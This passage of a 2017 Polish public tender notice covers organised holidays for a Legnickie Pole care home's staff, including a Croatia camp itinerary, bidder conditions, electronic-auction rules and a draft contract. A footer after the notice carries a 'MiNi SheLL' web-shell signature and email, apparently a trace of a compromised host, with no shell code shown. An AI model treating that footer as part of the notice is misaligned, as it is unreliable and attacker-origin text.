- wycieczka  do Dubrownika: Brama Pile, Mała Braca, studnia Onorfio, Klasztor Franciszkanów, katedra oraz Pałac Sponza (z zewnątrz). W drodze powrotnej na wyspę Korcula krótkie zwiedzanie zabytków miasta Orebić z Pałacem Stowarzyszenia Marynarzy i Pałacem Muzeum Marynarzy oraz Ston, w którym znajduje się europejski mur chiński
-rejs na baśniową wyspę Proizd - nazywaną Wyspą miłości. Wypoczynek  na plaży, leśne podchody, kąpiele w lazurowych wodach Morza Adriatyckiego.
-wieczory w miasteczku Vela Luka- lody, spacer do latarni morskiej. 
Program animacyjny: 
	chińskie inspiracje - nauka jedzenia pałeczkami, chińskie koki, teatr cieni, 
	wieczór gier planszowych, 
	gra terenowa nawiązująca do miejsca pobytu i jego historii. 
	zajęcia sportowe i rekreacyjne,
	wypoczynek nad morzem  plażowanie i kąpiele,
Dzień 9: Śniadanie. Przejazd do portu w Korczuli. Przeprawa promowa na  półwysep Pelješac, przejazd wzdłuż doliny rzeki Neretwy do Počitelj. Spacer po miasteczku(szkoła koraniczna meczet Hadżi-Alija). Po południu  przejazd do Mostaru - stolicy Hercegowiny, W programie: XVI  wieczny, kamienny most  symbol miasta, wpisany na listę UNESCO, starówka. Przejazd do Sarajewa, obiadokolacja i nocleg.
Dzień 10: Śniadanie. Zwiedzanie Sarajewa - stolicy Bośni i Hercegowiny m.in: Latinski Most - główne place Sarajewa, Bascarsija - turecki bazar z tradycyjnymi warsztatami rzemieślniczymi, cerkiew p.w. Archaniołów Gabriela i Michała (z zewnątrz), meczet Gazi Husrev-beja. Obiadokolacja, nocny przejazd do Polski.
Dzień 11: Zakończenie obozu.
7.Opieka: 
a) organizator wypoczynku jest zobowiązany do zapewnienia właściwej opieki uczestnikom wypoczynku, w szczególności: całodobowej opieki doświadczonej kadry zgodnie z przepisami MEN;
b) dostęp do całodobowej opieki lekarskiej i pielęgniarskiej 
c) opieka ratownicza (wychowawca-ratownik z uprawnieniami i doświadczeniem)
d) pokoje wychowawców i dzieci muszą być usytuowane na tym samym piętrze. W przypadku zakwaterowania uczestników obozu na sąsiadujących kondygnacjach na każdej z nich musi znajdować się pokój wychowawców.
8. Transport uczestników wypoczynku powinien zostać zorganizowany z uwzględnieniem wymagań określonych w ustawie  z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity Dz.U. 2016 poz. 1907),
a) wyjazd na obóz  nastąpi 08.07.2017 r. z Legnicy,  powrót 18.07.2017 r.do Legnicy.
b)Wykonawca zapewni uczestnikom wycieczki  transport komfortowym, klimatyzowanym  autokarem (nie starszym niż 5 lat), wyposażonym w toaletę, barek i odtwarzacz DVD. 
c)Wykonawca zapewni uczestnikom wypoczynku  transport do ośrodka wypoczynkowego w Vela Luka i transport powrotny.
d) obsługę min. dwóch kierowców 
e) Wykonawca zapewni opiekę doświadczonej kadry nad dziećmi w czasie przejazdu, zgodnie  przepisami MEN,
f) ubezpieczenie autokaru,
g) w przypadku awarii autokaru podstawienie autokaru zastępczego nastąpi na koszt Wykonawcy.
 9. Ubezpieczenie: uczestnicy wypoczynku muszą mieć zapewnione ubezpieczenie od następstw nieszczęśliwych wypadków i kosztów leczenia zarówno na czas pobytu, jak i czas podróży. Ubezpieczenie obejmuje okres momentu przekazania dzieci pod opiekę wychowawców w miejscu zbiórki do momentu odebrania dzieci przez opiekunów/rodziców po powrocie z wypoczynku. 
10. Dodatkowe wymagania:
Wykonawca zapewni bilety wstępów do zwiedzanych obiektów (według programu), przewodników oraz opłaty klimatyczne. Ponadto autokar zostanie na miejscu wycieczki i organizowane nim będą wyjazdy do okolicznych miejscowości na koszt Wykonawcy.
<br /><br /><b>II.5) Główny kod CPV: </b>63511000-4<br /><b> Dodatkowe kody CPV:</b>63500000-4,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              197000<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 10/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca musi posiadać wpis do rejestru organizatorów turystyki i pośredników turystycznych oraz figurować w Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych. Ocena spełniania warunku nastąpi na podstawie Oświadczenia  Wykonawcy (załącznik nr 2 do Ogłoszenia).<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, że wykonał należycie usługi, polegające na:
wykonanie co najmniej 2 kolonii zagranicznych lub 2 obozów zagranicznych, 2 wycieczek 3 dniowych krajowych w  okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie o wartości nie mniejszej niż ceny wycieczek zaoferowanych w ofercie oraz że wykonał je należycie.  Ocena spełniania warunku nastąpi na podstawie Oświadczenia  Wykonawcy (załącznik nr 2 do Ogłoszenia)oraz na podstawi wypełnionego załącznika nr 6 do Ogłoszenia- Wykaz usług.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie-na załączniku nr 6.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej (na załączniku nr 4), w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 2.Wniosek o dopuszczenie Wykonawcy do udziału w licytacji elektronicznej </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                licytacja elektroniczna
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px">https://licytacje.uzp.gov.pl/index.php</div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px">http://www.dpslp.nbip.pl/dpslp/</div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px">1. Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, oraz do przesłania swojego LOGIN-u Zamawiającemu, wypełniając informację we wniosku o dopuszczenie do udziału w licytacji elektronicznej. 2. Wniosek o dopuszczenie do udziału w licytacji elektronicznej stanowi załącznik nr 2 do ogłoszenia. 3. Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie. Przed rozpoczęciem korzystania z platformy zaleca się zapoznanie się z Samouczkiem, oraz z wersją demonstracyjną platformy, zamieszczonymi na stronie internetowej, na której będzie prowadzona licytacja elektroniczna. 4. Udział w licytacji elektronicznej wymaga dysponowania komputerem PC z systemem operacyjnym Windows/Linux oraz przeglądarką internetową Internet Explorer 6.0 lub wyższą lub Firefox 2.0 lub wyższą. 5. Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich wykonawców, którzy spełnią warunki udziału w postępowaniu, określając w zaproszeniu termin związania ofertą wykonawcy (30 dni), który zaoferuje najniższą cenę. </div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px">1.W toku jednoetapowej licytacji elektronicznej Wykonawcy składają oferty w postaci elektronicznej. 2.Wykonawca ma możliwość złożenia postąpienia od otwarcia licytacji do jej zamknięcia. Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny 3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców. 5. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda, pod ustalonym w ogłoszeniu o zamówieniu adresem internetowym, nazwę (firmę) oraz adres Wykonawcy, którego ofertę wybrano. 6. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę netto za całość zamówienia. 7. W trakcie licytacji Wykonawca podaje cenę netto (bez VAT) za wykonanie całości zamówienia określonego w pkt II. Cena wywoławcza: 197 000,00 zł (netto). Minimalne postąpienie 50.00 PLN netto (słownie: pięćdziesiąt  złotych). System nie przyjmie postąpienia, którego wartość jest mniejsza od określonego minimalnego postąpienia. Zamawiający zastrzega sobie prawo do zmian powyższych parametrów licytacji. O zmianach zostaną poinformowani wszyscy zaproszeni Wykonawcy. W celu ustalenia zaoferowanej ceny brutto za przedmiot licytacji - wynagrodzenie netto zaproponowane w ofercie zwycięskiej zostanie zwiększone o należną stawkę podatku VAT.</div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja jednoetapowa
                  <br />Czas trwania: <br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

                Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: 
                <br />

                Data: 29/03/2017 godzina: 10:00<br />

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">5 dni po terminie przekazania zaproszeń </div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px">1.Termin zamknięcia licytacji upływa 10 minut po złożeniu ostatniego postąpienia. 2. Po zamknięciu licytacji elektronicznej Zamawiający na stronie internetowej http://www.dpslp.nbip.pl/dpslp/ poda nazwę oraz adres Wykonawcy, którego ofertę wybrano jako najkorzystniejszą. 3. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy zobowiązany jest przedstawić Zmawiającemu kalkulację ceny  wg załącznika nr 1 do umowy. </div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Projekt umowy
UMOWA nr
z dnia .2017 roku
zawarta w wyniku przeprowadzonego postepowania w trybie licytacji elektronicznej  o numerze 230-2-3/17,

pomiędzy: 
Powiatem Legnickim 
Plac Słowiański 1, 59-220 Legnica 
NIP 691-22-26-286
reprezentowanym przez:
1.	Dyrektora Domu Pomocy Społecznej  w Legnickim Polu Dariusza Wojtkowiaka 	
przy kontrasygnacie finansowej Danuty Czyszczoń  Głównego Księgowego
zwanym dalej Zamawiającym.
a

NIP .
REGON ..
PESEL*.
Nr rachunku bankowego:  ..
reprezentowanym przez:

zwanym dalej  Wykonawcą

Umowa stanowi co następuje:
§ 1
1.Przedmiotem zamówienia jest usługa organizacji wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2017 r. Na zadanie składa się:
a)zorganizowanie 3-dniowej wycieczki autokarowej objazdowej do Baranowa Sandomierskiego, Sandomierza, Opatowa, Kazimierza Dolnego i Zwolenia w terminie 8-10.09.2017 r. dla  130 osób.
b) zorganizowanie kolonii/obozu w  Pogorzelicy w dniach 24.06-07.07.2017 r. dla 20 osób.
c) zorganizowanie kolonii/obozu w Chorwacji w dniach 08.07-18.07.2017 r. dla 30 osób.
2. Zamawiający zastrzega sobie prawo zmiany ilości osób biorących w organizowanym wypoczynku i zobowiązuje się poinformować o tym Wykonawcę najpóźniej na: 
a) 21 dni przed planowaną wycieczką określoną w  § 1 pkt. 1a.
b) 14 dni przed planowanym wypoczynkiem określonym w § 1 pkt. 1b-c.
3.Termin realizacji umowy: od podpisania  do 10.09.2017 r.


§ 2
1.Wykonawca zobowiązuje się zapewnić zorganizowanie wypoczynku dla pracowników Domu Pomocy Społecznej w Legnickim Polu i ich rodzin w 2017 r. zgodnie ze szczegółowym opisem przedmiotu zamówienia- załącznikiem nr 5 do Ogłoszenia o zamówieniu, który stanowi integralną część umowy,
§ 3
1.Strony uzgadniają wynagrodzenie umowne na kwotę  zł brutto. Słownie:..zł.
w tym: 
a)za zorganizowanie 3-dniowej wycieczki autokarowej objazdowej do Baranowa Sandomierskiego, Sandomierza, Opatowa, Kazimierza Dolnego i Zwolenia w terminie 8-10.09.2017 r. Wynagrodzenie umowne w wysokości ..zł będzie płatne przelewem na konto Wykonawcy po otrzymaniu faktury  (80 % wynagrodzenia  w dniu wyjazdu, 20 % wynagrodzenia po zrealizowaniu usługi).
b) za zorganizowanie kolonii/obozu w  Pogorzelicy w dniach 24.06-07.07.2017 r. wynagrodzenie umowne w wysokości ..zł płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia  w pierwszym dniu roboczym od dnia wyjazdu, 20 % wynagrodzenia po zrealizowaniu usługi).
c) za zorganizowanie kolonii/obozu w Chorwacji w dniach 08.07-18.07.2017 r.-wynagrodzenie umowne w wysokości ..zł płatne przelewem na konto Wykonawcy po otrzymaniu faktury (80 % wynagrodzenia  w pierwszym dniu roboczym od dnia wyjazdu 20 % wynagrodzenia po zrealizowaniu usługi).
2. W przypadku zmiany ilości osób biorących udział w organizowanym wypoczynku, ulegnie zmianie kwota wynagrodzenia dla Wykonawcy.
3. .Faktury będą wystawiane w następujący sposób: Nabywca: Powiat Legnicki, ul. Plac Słowiański 1, 59-220 Legnica, NIP 691-22-26-286, Odbiorca: Dom Pomocy Społecznej w Legnickim Polu, ul. Benedyktynów 4, 59-241 Legnickie Pole.
4.Wykonawca w okresie obowiązywania umowy zobowiązany jest posiadać aktualne (ciągłe) ubezpieczenie od odpowiedzialności cywilnej (OC) z tytułu wykonywanej działalności.
5. W przypadku upływu okresu ubezpieczenia (o którym mowa w ust. 4) w trakcie obowiązywania niniejszej umowy, Wykonawca jest każdorazowo zobowiązany do niezwłocznego przedłożenia Zamawiającemu dokumentu ubezpiecze-niowego potwierdzającego objęcie w/w ubezpieczeniem na kolejny okres. 

§ 4
1.Wykonawca zapłaci Zamawiającemu kary umowne za nienależyte wykonanie przedmiotu umowy   w wysokości: 10 % całego wynagrodzenia umownego brutto wynikającego z § 3 pkt 1 umowy.
2.Za odstąpienie od umowy z przyczyn obciążających Wykonawcę, Wykonawca jest obowiązany zapłacić Zamawiającemu karę umowną w wysokości 10 % wartości brutto przedmiotu umowy określonej § 3 pkt.
3.Kara powyższa nie podlega sumowaniu z innymi karami.	
4.Zamawiający może odstąpić od umowy, jeżeli Wykonawca nie przystąpił do wykonania przedmiotu. W takim przypadku Wykonawca jest obowiązany zapłacić Zamawiającemu karę umowną w wysokości 10 % wartości brutto przedmiotu umowy.
5.Za odstąpienie od umowy z przyczyn zawinionych przez Zamawiającego, Zamawiający wypłaci Wykonawcy karę umowną w wysokości 10 % wartości brutto przedmiotu umowy § 3 pkt 1.
6.Jeżeli kara nie pokrywa szkody, Zamawiający może dochodzić odszkodowania na zasadach ogólnych.
7.Wykonawca wyraża zgodę na potrącenie kar umownych z przysługującego mu wynagrodzenia.
§ 5
1. Spory wynikłe na tle realizacji niniejszej umowy rozstrzygane będą przez Sądy Powszechne w Legnicy, właściwe ze względu na siedzibę Zamawiającego.
2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają, pod rygorem nieważności, zachowania     formy pisemnej.
3. W sprawach nieuregulowanych w niniejszej umowie będą miały zastosowanie przepisy Kodeksu    Cywilnego.
4. Niniejszą umowę sporządzono w 3-ch jednobrzmiących egzemplarzach: 2 egz. dla Zamawiającego, 1 egz. dla Wykonawcy.
</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />Zamawiający nie ujawnia informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu art. 11 ust. 4 ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t. j. Dz. U. z 2003 r. Nr 153, poz. 1503 z późn. zm.), jeżeli Wykonawca nie później niż w terminie składania ofert zastrzegł, że nie mogą one być udostępnione. W związku z powyższym Wykonawca zobowiązany jest do wypełnienia odpowiedniego punktu we Wniosku o dopuszczenie do licytacji elektronicznej. Zastrzeżone informacje winny być odpowiednio oznaczone na właściwym dokumencie z widocznym napisem: tajemnica przedsiębiorstwa i złożone w odrębnej kopercie wewnętrznej, a na ich miejscu w dokumentacji należy zamieścić stosowne odsyłacze. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 u.p.z.p. <br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie Zamawiającego są: wniosek o dopuszczenie do udziału w licytacji elektronicznej- załącznik nr 1 Oświadczenie wykonawcy dotyczące spełniania warunków udziału w postepowaniu- załącznik nr 2 Oświadczenie wykonawcy dotyczące przesłanek wykluczenia- załącznik nr 3 Oświadczenie o przynależności/braku przynależności do grupy kapitałowej- załącznik nr 4 Opis przedmiotu zamówienia- załącznik nr 5 Wykaz usług -załącznik nr 6 Wzór umowy- załącznik nr 7 </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com